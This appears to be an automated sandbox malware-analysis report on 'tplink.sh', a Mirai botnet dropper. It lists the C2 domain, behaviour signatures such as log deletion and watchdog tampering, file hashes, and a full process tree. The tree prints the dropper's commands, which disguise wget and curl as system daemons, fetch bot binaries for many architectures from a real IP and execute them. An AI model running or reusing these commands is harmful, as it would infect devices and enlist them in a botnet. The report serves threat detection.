Analysis

  • max time kernel
    150s
  • max time network
    134s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags
    arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
  • submitted
    21-08-2024 17:47

General

  • Target

    tplink.sh

  • Size

    827B

  • MD5

    503a6790064c0d8afb7220d7ff4d559d

  • SHA1

    c00a805062e7a6274dde96063d42065ba2286085

  • SHA256

    f495ac84e4181503f0e6e4e21728a0cb82c7e9a3f6e1e54741f6eaf589aea82e

  • SHA512

    6c7ab7e8cf0b5b07b1c9cae94e4631e3fab493366d80d9946ba75a11897d8dfe658dcd96fd26d04c3b85a87786aa0656293e331a2b436b018547634c0dd45e37

Score
10/10

Malware Config

Extracted

Family

mirai

C2

really.idoingitagain.space

Signatures

  • Mirai

    Mirai is a prevalent Linux malware family that infects exposed network devices.

  • Deletes Audit logs (1 TTP, 1 IoC)

    Deletes logs related to the Linux Audit framework.

  • Deletes system logs (1 TTP, 1 IoC)

    Deletes the log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

  • Executes dropped EXE (24 IoCs)
  • Modifies Watchdog functionality (1 TTP, 2 IoCs)

    Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.

  • Deletes log files (1 TTP, 1 IoC)

    Deletes log files on the system.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Changes its process name (1 IoC)
  • Reads CPU attributes (1 TTP, 18 IoCs)
  • Reads runtime system information (64 IoCs)

    Reads data from the /proc virtual filesystem.

  • Writes file to tmp directory (13 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/tplink.sh
    /tmp/tplink.sh
    1⤵
    PID:710
    • /bin/cp
      cp -p /usr/bin/pkill httpd
      2⤵
      • Writes file to tmp directory
      PID:715
    • /bin/cp
      cp -p /usr/bin/wget sshd
      2⤵
      • Writes file to tmp directory
      PID:719
    • /bin/cp
      cp -p /usr/bin/curl telnetd
      2⤵
      • Writes file to tmp directory
      PID:724
    • /bin/chmod
      chmod +x httpd
      2⤵
      PID:726
    • /bin/chmod
      chmod 777 httpd
      2⤵
      PID:728
    • /bin/chmod
      chmod +x sshd
      2⤵
      PID:730
    • /bin/chmod
      chmod 777 sshd
      2⤵
      PID:732
    • /bin/chmod
      chmod +x telnetd
      2⤵
      PID:734
    • /bin/chmod
      chmod 777 telnetd
      2⤵
      PID:736
    • /usr/bin/pkill
      pkill -f bot.x86
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:738
    • /tmp/httpd
      ./httpd -f bot.x86
      2⤵
      • Executes dropped EXE
      • Reads CPU attributes
      • Reads runtime system information
      PID:740
    • /usr/bin/pkill
      pkill -f bot.arm4
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:742
    • /tmp/httpd
      ./httpd -f bot.arm4
      2⤵
      • Executes dropped EXE
      • Reads CPU attributes
      • Reads runtime system information
      PID:744
    • /usr/bin/pkill
      pkill -f bot.arm5
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:746
    • /tmp/httpd
      ./httpd -f bot.arm5
      2⤵
      • Executes dropped EXE
      • Reads CPU attributes
      • Reads runtime system information
      PID:749
    • /usr/bin/pkill
      pkill -f bot.arm6
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:750
    • /tmp/httpd
      ./httpd -f bot.arm6
      2⤵
      • Executes dropped EXE
      • Reads CPU attributes
      • Reads runtime system information
      PID:751
    • /usr/bin/pkill
      pkill -f bot.arm7
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:753
    • /tmp/httpd
      ./httpd -f bot.arm7
      2⤵
      • Executes dropped EXE
      • Reads CPU attributes
      • Reads runtime system information
      PID:754
    • /usr/bin/pkill
      pkill -f x86
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:756
    • /tmp/httpd
      ./httpd -f x86
      2⤵
      • Executes dropped EXE
      • Reads CPU attributes
      • Reads runtime system information
      PID:757
    • /usr/bin/pkill
      pkill -f arm5
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:758
    • /tmp/httpd
      ./httpd -f arm5
      2⤵
      • Executes dropped EXE
      • Reads CPU attributes
      • Reads runtime system information
      PID:759
    • /usr/bin/pkill
      pkill -f arm6
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:760
    • /tmp/httpd
      ./httpd -f arm6
      2⤵
      • Executes dropped EXE
      • Reads CPU attributes
      • Reads runtime system information
      PID:761
    • /usr/bin/pkill
      pkill -f arm7
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:762
    • /tmp/httpd
      ./httpd -f arm7
      2⤵
      • Executes dropped EXE
      • Reads CPU attributes
      • Reads runtime system information
      PID:763
    • /tmp/sshd
      ./sshd http://45.66.231.129/xd_/cyber-x86
      2⤵
      • Executes dropped EXE
      • Writes file to tmp directory
      PID:764
    • /bin/chmod
      chmod 777 cyber-x86
      2⤵
      PID:765
    • /bin/chmod
      chmod +x cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
      2⤵
      PID:766
    • /tmp/cyber-x86
      ./cyber-x86 tplink-x86
      2⤵
      • Executes dropped EXE
      PID:767
    • /tmp/sshd
      ./sshd http://45.66.231.129/xd_/cyber-sh4
      2⤵
      • Executes dropped EXE
      • Writes file to tmp directory
      PID:769
    • /bin/chmod
      chmod 777 cyber-sh4
      2⤵
      PID:770
    • /bin/chmod
      chmod +x cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
      2⤵
      PID:771
    • /tmp/cyber-sh4
      ./cyber-sh4 tplink-sh4
      2⤵
      • Executes dropped EXE
      PID:772
    • /tmp/sshd
      ./sshd http://45.66.231.129/xd_/cyber-ppc
      2⤵
      • Executes dropped EXE
      • Writes file to tmp directory
      PID:774
    • /bin/chmod
      chmod 777 cyber-ppc
      2⤵
      PID:775
    • /bin/chmod
      chmod +x cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
      2⤵
      PID:776
    • /tmp/cyber-ppc
      ./cyber-ppc tplink-ppc
      2⤵
      • Executes dropped EXE
      PID:777
    • /tmp/sshd
      ./sshd http://45.66.231.129/xd_/cyber-mpsl
      2⤵
      • Executes dropped EXE
      • Writes file to tmp directory
      PID:779
    • /bin/chmod
      chmod 777 cyber-mpsl
      2⤵
      PID:780
    • /bin/chmod
      chmod +x cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
      2⤵
      PID:781
    • /tmp/cyber-mpsl
      ./cyber-mpsl tplink-mpsl
      2⤵
      • Executes dropped EXE
      PID:782
    • /tmp/sshd
      ./sshd http://45.66.231.129/xd_/cyber-mips
      2⤵
      • Executes dropped EXE
      • Writes file to tmp directory
      PID:784
    • /bin/chmod
      chmod 777 cyber-mips
      2⤵
      PID:785
    • /bin/chmod
      chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
      2⤵
      PID:787
    • /tmp/cyber-mips
      ./cyber-mips tplink-mips
      2⤵
      • Deletes Audit logs
      • Deletes system logs
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Deletes log files
      • Changes its process name
      PID:788
    • /tmp/sshd
      ./sshd http://45.66.231.129/xd_/cyber-m68k
      2⤵
      • Executes dropped EXE
      • Writes file to tmp directory
      PID:791
    • /bin/chmod
      chmod 777 cyber-m68k
      2⤵
      PID:797
    • /bin/chmod
      chmod +x cyber-m68k
      2⤵
      PID:798
    • /bin/chmod
      chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
      2⤵
      PID:800
    • /tmp/cyber-m68k
      ./cyber-m68k tplink-m68k
      2⤵
      PID:801
    • /tmp/sshd
      ./sshd http://45.66.231.129/xd_/cyber-arm7
      2⤵
      • Executes dropped EXE
      • Writes file to tmp directory
      PID:803
    • /bin/chmod
      chmod 777 cyber-arm7
      2⤵
      PID:811
    • /bin/chmod
      chmod +x cyber-arm7
      2⤵
      PID:813
    • /bin/chmod
      chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
      2⤵
      PID:815
    • /tmp/cyber-arm7
      ./cyber-arm7 tplink-arm7
      2⤵
      PID:816
    • /tmp/sshd
      ./sshd http://45.66.231.129/xd_/cyber-arm6
      2⤵
      • Executes dropped EXE
      • Writes file to tmp directory
      PID:818
    • /bin/chmod
      chmod 777 cyber-arm6
      2⤵
      PID:826
    • /bin/chmod
      chmod +x cyber-arm6
      2⤵
      PID:828
    • /bin/chmod
      chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
      2⤵
      PID:829
    • /tmp/cyber-arm6
      ./cyber-arm6 tplink-arm6
      2⤵
      PID:830
    • /tmp/sshd
      ./sshd http://45.66.231.129/xd_/cyber-arm5
      2⤵
      • Executes dropped EXE
      • Writes file to tmp directory
      PID:832
    • /bin/chmod
      chmod 777 cyber-arm5
      2⤵
      PID:842
    • /bin/chmod
      chmod +x cyber-arm5
      2⤵
      PID:845
    • /bin/chmod
      chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
      2⤵
      PID:846
    • /tmp/cyber-arm5
      ./cyber-arm5 tplink-arm5
      2⤵
      PID:848
    • /tmp/sshd
      ./sshd http://45.66.231.129/xd_/cyber-arm4
      2⤵
      • Executes dropped EXE
      • Writes file to tmp directory
      PID:849
    • /bin/chmod
      chmod 777 cyber-arm4
      2⤵
      PID:856
    • /bin/chmod
      chmod +x cyber-arm4
      2⤵
      PID:857
    • /bin/chmod
      chmod +x cyber-mips cyber-mpsl cyber-ppc cyber-sh4 cyber-x86 httpd sshd systemd-private-d96c66359ccc40d68383a4b82c30a103-systemd-timedated.service-Ng06f7 telnetd tplink.sh
      2⤵
      PID:858
    • /tmp/cyber-arm4
      ./cyber-arm4 tplink-arm4
      2⤵
      PID:859

Network

MITRE ATT&CK Enterprise v15


Downloads

  • /tmp/cyber-mips
    Filesize
    95KB
    MD5
    f74e3ea702aac682cea4e7e5c11767df
    SHA1
    fe9c9ada37285e03bd3d3a74b115acf59e55928d
    SHA256
    182c153838ebbc0d5191b7bbf97c993d84456c414fff04dd4b7bfe32f00cbd3b
    SHA512
    7b954686f1b0e16ea73d5ffd6a5626d41d2f5a4c43b91f1270f1d0c55d7e534b7989dc5af2ee81e92c004e916cea7c147a43704e934a12bc6199e6b4dcce1af6

  • /tmp/cyber-mpsl
    Filesize
    97KB
    MD5
    605c719579681c44f640587ff4dc6db2
    SHA1
    b2d17a8d7dd094a6c2d87f993e130383e94e16de
    SHA256
    34e3196effc44c3fea00cd70a38c3d4ba747255911b6be2a2c9ef09a47168c47
    SHA512
    cb9ff093b9061180d9f6294e80560000fd7fd36b54521ddf5763dc10a399deeaeb0aa0461807b2034562280f8d98a44f41cb7e4368c5ac78a1d8390345840ac7

  • /tmp/cyber-ppc
    Filesize
    65KB
    MD5
    cc543d4df9e33766e382e50ebfdad980
    SHA1
    8a46b3f78f375cf06b9610be58fafe89c61969b2
    SHA256
    40bcd636db4a86441b44b9c20ce3d759ddef4a18c168945b53df951edf0b3d42
    SHA512
    38ed37e68e99dbb8658dd1f3823e27baef01206b40ec5d0a6a71fd21ff173566b81666a593c8e3a1ccb8c7851bf74bdd11339410200e0508ce69d5ac39352d08

  • /tmp/cyber-sh4
    Filesize
    51KB
    MD5
    666096845b3b27722b9d9629ddff12c1
    SHA1
    0bed897edd6422c3cfb24b0db44a2c87227e4e6e
    SHA256
    dd38e661acad7a79affb7b8b0abe2eb634bfd04c338afd5f7bd93a34aa16dd31
    SHA512
    229c4c1dda0224b90d6c827c2d63c6a3d90453e5358e38ffaa06c9f3f49d4cfd6e2464a86d69b9a6b06350b003d95a5d7c0312329bb1a51eb9956c12b8052789

  • /tmp/cyber-x86
    Filesize
    61KB
    MD5
    3d574d6a4916704b337d76226d205abd
    SHA1
    80021cc1fc609bde17db484e58dece6a247ee11d
    SHA256
    df0f2131b26054328c7ae7428b6cc4d05967dfd334126a99d26660335c02eb0d
    SHA512
    e5a843ba13eeb9d83fd0a5b3d34cecfa449e6f9ba77cea1b8867b0fbf91c2d4bbc14f6e8cd27b5550622781b8b29ae0ac952c4ab4e7e4eb5f174a1fd2e24d5a9

  • /tmp/httpd
    Filesize
    26KB
    MD5
    d9addfdd64ccedc9640f9734d8b9a0a7
    SHA1
    29f5c2d0a7156c66d85d90db035216b13677c807
    SHA256
    238bd4df1c42427726bcc0f923fa0cffe73c732c38aceab5f73feb056e8da40c
    SHA512
    527cc35790cbd883cd385e15cf44cb65d3ec1998cb709d2e7088d462f609767428edb0efa6e3f1cda6b9f8a9d9abf05db722597b7e864d4c14b6477f053084ba

  • /tmp/sshd
    Filesize
    536KB
    MD5
    7bb64131b781b7fe42df16e951677c42
    SHA1
    b975e340d8aa1fade395322a2ce1d84ec8e8fdc3
    SHA256
    fc6db07a0e096020bb4023351df4819d74992e0148c939582ef3f83e73e56b58
    SHA512
    544f0b7ff535ff129be1b51e545a4e991b928d7388f9024f9c33582951980f62171f06cb7f89f03ab080d0f60a3530365ca9b98ff1ad56b984ccf58cfb59aee0

  • /tmp/telnetd
    Filesize
    186KB
    MD5
    e045e492b033a4f0e2168aaa509f5fd5
    SHA1
    4e2b28d07da66205e6a5875a3579f4c2bd18d4cc
    SHA256
    226c62fcbf25743a88180b10072e6b3c96dc6b08559a96ea0a67cdb94b3d15ca
    SHA512
    22dce34af0f4270709c72d8a7557f15939a72ab73d574f4bb8f295ca7e1907e3a42846a31092c34a147c58aa1a2dd05bb2d0656bdcffbc8a5ee5b6d9e82b0074